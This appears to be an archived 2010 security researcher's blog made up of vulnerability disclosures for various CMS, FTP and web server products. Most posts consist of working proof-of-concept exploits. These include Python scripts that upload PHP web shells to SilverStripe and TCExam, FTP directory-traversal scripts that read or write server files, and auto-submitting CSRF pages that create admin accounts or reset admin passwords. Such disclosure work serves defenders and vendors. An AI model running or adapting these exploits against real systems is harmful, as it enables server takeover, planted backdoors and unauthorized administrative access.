This site is soon to be deprecated by http://www.johnleitch.net
Showing posts with label security. Show all posts
Showing posts with label security. Show all posts

Monday, June 7, 2010

SilverStripe CMS 2.4.0 Arbitrary Upload

An arbitrary upload vulnerability in SilverStripe CMS 2.4.0 can be exploited to upload a PHP shell. A user account with File & Images permission is necessary to exploit this vulnerability.

PoC
Silverstripe-Shell.py
import sys, socket, re
host = '192.168.1.4'
path = '/silverstripe'
username = 'admin'
password = 'Password1'
port = 80

def send_request(request):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send(request)

    resp = ''

    while 1:
        r = s.recv(8192)
        if not r: break
        resp += r
        if r[:15] == 'HTTP/1.1 302 OK': break

    s.close()

    return resp

def upload_shell():
    print 'authenticating'

    content = 'AuthenticationMethod=MemberAuthenticator&Email=' + username + '&Password='+ password + '&action_dologin=Log+in'

    header = 'POST http://' + host + path + '/Security/LoginForm HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: http://' + host + '\r\n'\
             'Content-Type: application/x-www-form-urlencoded\r\n'\
             'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             '\r\n'    

    resp = send_request(header + content)

    print 'uploading shell'

    match = re.findall(u'Set-Cookie:\s([^\r\n]+)', resp)

    for m in match:
        if m[:9] == 'PHPSESSID':
            cookie = m

    content = '------x\r\n'\
              'Content-Disposition: form-data; name="ID"\r\n'\
              '\r\n'\
              '0\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="FolderID"\r\n'\
              '\r\n'\
              '0\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="action_doUpload"\r\n'\
              '\r\n'\
              '1\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="Files[1]"; filename=""\r\n'\
              '\r\n'\
              '\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="Files[0]"; filename="shell.jpg"\r\n'\
              'Content-Type: image/jpeg\r\n'\
              '\r\n'\
              '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n'\
              '\r\n'\
              '\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="action_upload"\r\n'\
              '\r\n'\
              'Upload Files Listed Below\r\n'\
              '------x--\r\n'\

    header = 'POST http://' + host + path + '/admin/assets/UploadForm HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Proxy-Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: http://' + host + '\r\n'\
             'Content-Type: multipart/form-data; boundary=----x\r\n'\
             'Accept: text/html\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             'Cookie: ' + cookie + '\r\n'\
             '\r\n'

    resp = send_request(header + content)

    print 'grabbing ids'

    file_id = re.search(u'/\*\sIDs:\s(\d+)\s\*/', resp).group(1)
    file_name = re.search(u'/\*\sNames:\s([^\*]+)\s\*/', resp).group(1)    

    resp = send_request('GET http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1 HTTP/1.1\r\n'\
                        'Host: ' + host + '\r\n'\
                        'Cookie: ' + cookie + '\r\n\r\n')

    print 'renaming shell'

    security_id = re.search(u'name="SecurityID" value="(\d+)"', resp).group(1)
    owner_id = re.search(u'option selected="selected" value="(\d+)"', resp).group(1)

    content = 'Title=' + file_name + '&Name=shell.php&FileType=JPEG+image+-+good+for+photos&Size=56+bytes&OwnerID=' + owner_id + '&Dimensions=x&ctf%5BchildID%5D=' + file_id + '&ctf%5BClassName%5D=File&SecurityID=' + security_id + '&action_saveComplexTableField=Save'

    header = 'POST http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/DetailForm HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Proxy-Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Referer: http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: http://' + host + '\r\n'\
             'Content-Type: application/x-www-form-urlencoded\r\n'\
             'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             'Cookie: ' + cookie + '; PastMember=1\r\n'\
             '\r\n'

    resp = send_request(header + content)   

    print 'shell located at http://' + host + path + '/assets/shell.php'

upload_shell()
Posted by John Leitch at 2:19 PM 30 comments
Labels: , , ,

Tuesday, June 1, 2010

TCExam 10.1.006 Arbitrary Upload

An arbitrary upload vulnerability in tce_functions_tcecode_editor.php of TCExam 10.1.006 can be exploited to upload a PHP shell.

PoC
TCExam-Shell.py
import sys, socket
host = 'localhost'
tc_exam = 'http://' + host + '/TCExam'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    content = '------x\r\n'\
              'Content-Disposition: form-data; name="sendfile0"\r\n'\
              '\r\n'\
              'shell.php\r\n'\
              '------x\r\n'\
              'Content-Disposition: form-data; name="userfile0"; filename="shell.php"\r\n'\
              'Content-Type: application/octet-stream\r\n'\
              '\r\n'\
              '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
              '------x--\r\n'\
              '\r\n'

    header = 'POST ' + tc_exam + '/admin/code/tce_functions_tcecode_editor.php HTTP/1.1\r\n'\
             'Host: ' + host + '\r\n'\
             'Proxy-Connection: keep-alive\r\n'\
             'User-Agent: x\r\n'\
             'Content-Length: ' + str(len(content)) + '\r\n'\
             'Cache-Control: max-age=0\r\n'\
             'Origin: null\r\n'\
             'Content-Type: multipart/form-data; boundary=----x\r\n'\
             'Accept: text/html\r\n'\
             'Accept-Encoding: gzip,deflate,sdch\r\n'\
             'Accept-Language: en-US,en;q=0.8\r\n'\
             'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
             'Cookie: LastVisit=1275442604\r\n'\
             '\r\n'

    s.send(header + content)

    http_ok = 'HTTP/1.1 200 OK'
    
    if http_ok not in s.recv(8192):
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    s.send('GET ' + tc_exam + '/cache/shell.php HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192): print 'shell not found'        
    else: print 'shell located at ' + tc_exam + '/cache/shell.php'

upload_shell()
Posted by John Leitch at 8:09 PM 235 comments
Labels: , , , ,

Sunday, May 30, 2010

Fiddler XSRF Inspector 1.0 Released

Download



Overview
Fiddler XSRF Inspector is a plugin for Fiddler 2 that extracts cross-site request forgery attacks from HTTP requests.

Installation
Copy FiddlerXSRF.dll to the Fiddler 2 Inspectors folder, generally %ProgramFiles%\Fiddler2\Inspectors

Instructions
1) Capture the request that is going to be used to create a cross-site request forgery attack.
2) Navigate to the XSRF tab under inspectors to see the generated HTML. If the request uses the POST method, the option to convert it to GET will be available.
3) Click the Test button and observe the results.

Change Log
1.0
Initial Release
Posted by John Leitch at 2:09 PM 30 comments
Labels: , , , , , ,

SugarCRM Community Edition 5.5.2 Cross-site Request Forgery

A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create a new admin.

PoC
<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
            <input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&amp;display_tabs[]=Dashboard&amp;display_tabs[]=Calendar&amp;display_tabs[]=Activities&amp;display_tabs[]=Leads&amp;display_tabs[]=Contacts&amp;display_tabs[]=Accounts&amp;display_tabs[]=Opportunities&amp;display_tabs[]=Emails&amp;display_tabs[]=Campaigns&amp;display_tabs[]=Cases&amp;display_tabs[]=Documents&amp;" />
            <input type="hidden" name="hide_tabs_def" value="" />
            <input type="hidden" name="remove_tabs_def" value="" />
            <input type="hidden" name="module" value="Users" />
            <input type="hidden" name="record" value="" />
            <input type="hidden" name="action" value="Save" />
            <input type="hidden" name="page" value="EditView" />
            <input type="hidden" name="return_module" value="Users" />
            <input type="hidden" name="return_id" value="" />
            <input type="hidden" name="return_action" value="DetailView" />
            <input type="hidden" name="password_change" value="true" />
            <input type="hidden" name="required_password" value="1" />
            <input type="hidden" name="user_name" value="" />
            <input type="hidden" name="type" value="" />
            <input type="hidden" name="is_group" value="0" />
            <input type="hidden" name="portal_only" value="" />
            <input type="hidden" name="is_admin" value="1" />
            <input type="hidden" name="is_current_admin" value="1" />
            <input type="hidden" name="required_email_address" value="0" />
            <input type="hidden" name="sugar_user_name" value="new_admin" />
            <input type="hidden" name="unique_name" value="" />
            <input type="hidden" name="first_name" value="" />
            <input type="hidden" name="status" value="Active" />
            <input type="hidden" name="last_name" value="a" />
            <input type="hidden" name="UserType" value="Administrator" />
            <input type="hidden" name="old_password" value="" />
            <input type="hidden" name="new_password" value="Password1" />
            <input type="hidden" name="confirm_new_password" value="Password1" />
            <input type="hidden" name="emailAddressWidget" value="1" />
            <input type="hidden" name="emailAddress0" value="" />
            <input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
            <input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
            <input type="hidden" name="emailAddressVerifiedValue0" value="" />
            <input type="hidden" name="useEmailWidget" value="true" />
            <input type="hidden" name="email_link_type" value="sugar" />
            <input type="hidden" name="mail_smtpuser" value="" />
            <input type="hidden" name="mail_smtppass" value="" />
            <input type="hidden" name="employee_status" value="Active" />
            <input type="hidden" name="title" value="" />
            <input type="hidden" name="phone_work" value="" />
            <input type="hidden" name="department" value="" />
            <input type="hidden" name="phone_mobile" value="" />
            <input type="hidden" name="reports_to_name" value="" />
            <input type="hidden" name="reports_to_id" value="" />
            <input type="hidden" name="phone_other" value="" />
            <input type="hidden" name="phone_fax" value="" />
            <input type="hidden" name="phone_home" value="" />
            <input type="hidden" name="messenger_type" value="" />
            <input type="hidden" name="messenger_id" value="" />
            <input type="hidden" name="address_street" value="" />
            <input type="hidden" name="address_city" value="" />
            <input type="hidden" name="address_state" value="" />
            <input type="hidden" name="address_postalcode" value="" />
            <input type="hidden" name="address_country" value="" />
            <input type="hidden" name="description" value="" />
            <input type="hidden" name="receive_notifications" value="12" />
            <input type="hidden" name="export_delimiter" value="," />
            <input type="hidden" name="mailmerge_on" value="0" />
            <input type="hidden" name="reminder_time" value="60" />
            <input type="hidden" name="default_export_charset" value="ISO-8859-1" />
            <input type="hidden" name="user_max_tabs" value="12" />
            <input type="hidden" name="user_max_subtabs" value="12" />
            <input type="hidden" name="user_subpanel_tabs" value="on" />
            <input type="hidden" name="dateformat" value="m/d/Y" />
            <input type="hidden" name="currency" value="-99" />
            <input type="hidden" name="timeformat" value="H:i" />
            <input type="hidden" name="default_currency_significant_digits" value="2" />
            <input type="hidden" name="timezone" value="Africa/Abidjan" />
            <input type="hidden" name="ut" value="0" />
            <input type="hidden" name="num_grp_sep" value="," />
            <input type="hidden" name="default_locale_name_format" value="s f l" />
            <input type="hidden" name="dec_sep" value="." />
            <input type="hidden" name="calendar_publish_key" value="" />
            <input type="hidden" name="outboundtest_from_address" value="" />
        </form>
    </body>
</html>
Posted by John Leitch at 2:02 PM 8 comments
Labels: , , , ,

Thursday, May 27, 2010

Core FTP Server 1.0.343 Directory Traversal

It's possible to navigate the local file system of a server running Core FTP Server 1.0.343 by using a specially crafted URL.

Exploit
/...

PoC
list_root.py
import sys, socket, re

host = 'localhost'
port = 21
user = 'anonymous'
password = 'a'

buffer_size = 8192
timeout = 8

def recv(s):
    resp = ''

    while 1:
        r = s.recv(buffer_size)
        if not r: break
        resp += r

    return resp

def list_root():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.settimeout(timeout)

        print s.recv(buffer_size)            

        s.send('USER ' + user + '\r\n')                   
        print s.recv(buffer_size)            

        s.send('PASS ' + password + '\r\n')               
        print s.recv(buffer_size) + s.recv(buffer_size)

        s.send('CWD ' + '/...' * 16 + '\r\n')

        resp = s.recv(buffer_size)

        print resp
        
        if resp[:3] == '250':
            s.send('PASV\r\n')                                   
            resp =  s.recv(buffer_size)

            print resp
            
            pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)

            if (pasv_info == None):
                print 'Invalid PASV response: ' + resp
                return            

            s.send('LIST\r\n')            

            s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))
            s2.settimeout(timeout)           

            print recv(s2)

        s.close()

    except Exception:        
        print sys.exc_info()

list_root()
Posted by John Leitch at 7:42 PM 1 comments
Labels: , , ,

Home FTP Server 1.10.2.143 Directory Traversal

A directory traversal vulnerability in Home FTP Server 1.10.2.143 can be exploited to read, write, and delete files outside of the ftp root directory.

Exploit
RETR [Drive Letter]:\[Filename]
STOR [Drive Letter]:\[Filename]
DELE [Drive Letter]:\[Filename]


PoC
get_boot_ini.py
import sys, socket, re

host = 'localhost'
port = 21
user = 'anonymous'
password = ''

timeout = 8

buffer_size = 8192

def get_data_port(s):
    s.send('PASV\r\n')
    
    resp =  s.recv(buffer_size)

    pasv_info = re.search(u'(\d+),' * 5 + u'(\d+)', resp)

    if (pasv_info == None):
        raise Exception(resp)
                    
    return int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))

def retr_file(s, filename):
    pasv_port = get_data_port(s)

    if (pasv_port == None):        
        return None    

    s.send('RETR ' + filename + '\r\n')
    resp = s.recv(8192)    

    if resp[:3] != '150': raise Exception(resp)

    print resp
    
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    
    s2.connect((host, pasv_port))
    s2.settimeout(2.0)                                     
    resp = s2.recv(8192)
    s2.close()    

    return resp

def get_file(filename):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(timeout)

    print s.recv(buffer_size)            

    s.send('USER ' + user + '\r\n')                   
    print s.recv(buffer_size)            

    s.send('PASS ' + password + '\r\n')               
    print s.recv(buffer_size)

    print retr_file(s, filename)

    print s.recv(buffer_size)        

    s.close()

get_file('c:\\boot.ini')
Posted by John Leitch at 5:17 PM 0 comments
Labels: , , , ,

Wednesday, May 26, 2010

Brekeke PBX 2.4.4.8 Cross-site Request Forgery

A cross-site request forgery vulnerability in Brekeke PBX 2.4.4.8 can be exploited via GET request to change the admin password.

PoC
<html>
<body>
    <img src="http://localhost:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" />
</body>
</html>
Posted by John Leitch at 2:23 PM 127 comments
Labels: , , , , ,

Pacific Timesheet 6.74 Cross-site Request Forgery

A cross-site request forgery vulnerability in Pacific Timesheet 6.74 can be exploited via GET request to create a new admin.

PoC
<html>
<body>
    <img src="http://localhost/timesheet/user/user-set.do?userId=0&flag=&cloneId=&wizard-page=1&loginX=new_admin&passwordX=password&passwordConfirmX=password&firstName=&lastName=a&uid=&status=A&roleId=1&type=&policyId=1&jobTitle=&groupId=0&billRateId=0&billRate=&payRateId=0&payRate=&salary=&firstDay=5%2F22%2F2010&lastDay=&scheduledDay%5B1%5D=on&scheduledDay%5B2%5D=on&scheduledDay%5B3%5D=on&scheduledDay%5B4%5D=on&scheduledDay%5B5%5D=on&scheduledHours=&scheduledHoursPerDay=&scheduledIn=&scheduledOut=&email=&phone=&mobile=&fax=&timeSheetId=1&carryForward=1&timeFormat=0&locale=en_US&timeZone=America%2FNew_York&apprv0Id=0&apprv0bId=0" />
</body>
</html>
Posted by John Leitch at 2:19 PM 6 comments
Labels: , , , , ,

Home FTP Server 1.10.2.143 Cross-site Request Forgery

A cross-site request forgery vulnerability in Home FTP Server 1.10.2.143 can be exploited via GET request to create an admin account with all permissions (read, write, delete, etc.)

PoC
<html>
<body>
    <img src="http://localhost/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" />
</body>
</html>
Posted by John Leitch at 2:17 PM 12 comments
Labels: , , , , ,

Sunday, May 23, 2010

Tele Data's Contact Management Server 0.9 Arbitrary File Write

An arbitrary file write vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to write to the local file system of the server.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt
Posted by John Leitch at 5:37 PM 3 comments
Labels: , , ,

Tele Data's Contact Management Server 0.9 Local File Inclusion

A local file inclusion vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to read files from the server file system.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini
Posted by John Leitch at 5:35 PM 0 comments
Labels: , , , ,

Open Forum Server 2.2 b005 Arbitrary File Write

An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be exploited to write to the local file system of the server.

Exploit
Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder.

PoC
import sys, socket
host = 'localhost'
port = 80

def send_request(request):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(32) # sometimes it takes a while
    s.connect((host, port))
    s.send(request)

    response = s.recv(8192) + s.recv(8192) # a hack within a hack   

    return response

def write_file():
    try:
        content = '----x--\r\n'\
                  'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
                  'Content-Type: application/octet-stream\r\n\r\n'\
                  'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
                  'data = "hello, world";\r\n'\
                  'user = transaction.getUser();\r\n'\
                  'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
                  'transaction.sendPage("File Written");\r\n\r\n'\
                  '----x----\r\n'
        
        response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n'
                                'Content-Type: multipart/form-data; boundary=--x--\r\n'
                                'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)

        if 'HTTP/1.1 302 Redirect' not in response:
            print 'Error writing get.sjs'
            return
        else: print 'get.sjs created'
        
        response = send_request('GET OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n\r\n')

        if 'File Written' not in response:
            print 'Error writing to root'
            return
        else: print 'x.txt created in root'
        
    except Exception:
        print sys.exc_info()          

write_file()
Posted by John Leitch at 1:47 PM 0 comments
Labels: , , ,

Friday, May 21, 2010

vtiger CRM 5.2.0 Shell Upload

A shell upload vunlerability in vtiger CRM 5.2.0 can be exploited to execute arbitrary PHP.

Exploit
Upload a PHP file and append a backslash to the filename_hidden value.


PoC

  1. Login and navigate to http://localhost/index.php?action=upload&module=uploads and upload a PHP file.

  2. Capture the packet using a debugging proxy, append a backslash to the filename_hidden value, and submit it. e.g.

    ------WebKitFormBoundaryihWhA69lH4hKrGBy
    Content-Disposition: form-data; name="filename_hidden"

    shell.php\

  3. Navigate to the uploaded file http://localhost/storage/{Year}/{Month}/{Week}/{file} e.g. http://localhost/storage/2010/May/week3/shell.php
Posted by John Leitch at 5:09 PM 33 comments
Labels: , , ,

vtiger CRM 5.2.0 XSRF

A cross-site request forgery vunlerability in vtiger CRM 5.2.0 can be exploited to create an new admin. The form values can also be sent via GET request, but the resulting user does not have admin privileges.

PoC:
<html>
    <body onload="document.forms[0].submit()">        
        <form name="EditView" method="post" action="http://localhost/index.php">            
            <input type="hidden" name="module" value="Users" />
            <input type="hidden" name="mode" value="create" />
            <input type="hidden" name="action" value="Save" />
            <input type="hidden" name="user_name" value="new_user" />
            <input type="hidden" name="is_admin" value="on" />
            <input type="hidden" name="user_password" value="new_password" />
            <input type="hidden" name="confirm_password" value="new_password" />
            <input type="hidden" name="email1" value="test@test.com" />
            <input type="hidden" name="status" value="Active" />
        </form>
    </body>
</html>
Posted by John Leitch at 4:53 PM 4 comments
Labels: , , ,

Saturday, May 15, 2010

Open Forum Server 2.2 b005 Directory Traversal

It's possible to navigate the local file system of a server running Open Forum Server 2.2 b005 by using a specially crafted URL.

Exploit:
%2F../
%5C../
%5C

PoC:
http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../boot.ini

http://localhost/Admin/Users/Admin/private%5Cpassword.txt


Note: the percent encoded backslash in the second second url bypasses authentication. However, the response is malformed so a debugging proxy may be necessary to view it.
Posted by John Leitch at 10:03 PM 0 comments
Labels: , , , ,

Zipserver 1.0 Directory Traversal

It's possible to navigate the local file system of a server running Zipserver 1.0 by using a specially crafted URL.

Exploit:
..%2F/
..%5C/

PoC:
http://localhost/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/

http://localhost/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/
Posted by John Leitch at 7:08 PM 0 comments
Labels: , , , ,

The Uniform Server 5.6.5 XSRF

A cross-site request forgery vunlerability in The Uniform Server 5.6.5 web UI can be exploited to change various administrative passwords.

PoC:
<html>
<head>
    <script type="text/javascript">
        window.onload = function() {
            var url = 'http://localhost/apanel';
            
            var xsrs = [
                {
                    "action": url + "/apsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "apuser", "value": "new_username" },
                        { "name": "appass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/psetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "puser", "value": "new_username" },
                        { "name": "ppass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/sslpsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "puser", "value": "new_username" },
                        { "name": "ppass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/mqsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "qpass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                }
            ];

            for (var x = 0; x < xsrs.length; x++) {
                var attackFrame = document.createElement('iframe');

                var html = '<html><body><form action="' + xsrs[x].action + '" ' +
                    'method="' + xsrs[x].method + '">';

                for (var y = 0; y < xsrs[x].fields.length; y++) {
                    html += '<input type="' +
                        (xsrs[x].fields[y].type != null ?
                            xsrs[x].fields[y].type : 'hidden') + '" ' +
                        'name="' + xsrs[x].fields[y].name + '" ' +
                        'value="' + xsrs[x].fields[y].value + '" />';
                }

                html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';

                document.body.appendChild(attackFrame);

                attackFrame.contentDocument.write(html);
            }
        }
    </script>
</head>
<body>
</body>
</html>
Posted by John Leitch at 4:37 PM 8 comments
Labels: , , , , ,

Thursday, May 13, 2010

Abyss Web Server X1 XSRF

A cross-site request forgery vunlerability in the Abyss Web Server X1 management console can be exploited to change both the username and password of the logged in user.


PoC:

<html>
    <body onload="document.forms[0].submit()">
        <form method="post" action="http://localhost:9999/console/credentials">
            <input type="hidden" name="/console/credentials/login" 
                   value="new_username" />    
            <input type="hidden" name="/console/credentials/password/$pass1" 
                   value="new_password" />    
            <input type="hidden" name="/console/credentials/password/$pass2" 
                   value="new_password" />    
            <input type="hidden" name="/console/credentials/bok" 
                   value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />    
        </form>    
    </body>
</html>
Posted by John Leitch at 3:30 PM 10 comments
Labels: , , , , ,

Tuesday, May 11, 2010

Zervit 0.4 Directory Traversal

It's possible to navigate the local file system of a server running Zervit 0.4 by using a specially crafted HTTP request. The resource path must be relative and the slashes unencoded.

Exploit:
GET /\../ HTTP/1.1

Host: localhost



or


GET //../ HTTP/1.1

Host: localhost


PoC:
zervit0.4-traversal.py
import sys, struct, socket
host ='localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /' + '\..' * 32 + '/ HTTP/1.1\r\n'
       'Host: ' + host + '\r\n\r\n')

while 1:
    response = s.recv(8192)
    if not response: break
    print response
Posted by John Leitch at 7:43 PM 21 comments
Labels: , , , , , ,

Sunday, May 9, 2010

Mereo 1.9.1 Directory Traversal

It's possible to navigate the local file system of a server running Mereo 1.9.1 by using a specially crafted URL.

Exploit: %80../

PoC: http://localhost/%80../%80../%80../%80../%80../%80../%80../%80../
Posted by John Leitch at 7:24 PM 0 comments
Labels: , , , , ,
Subscribe to: Posts (Atom)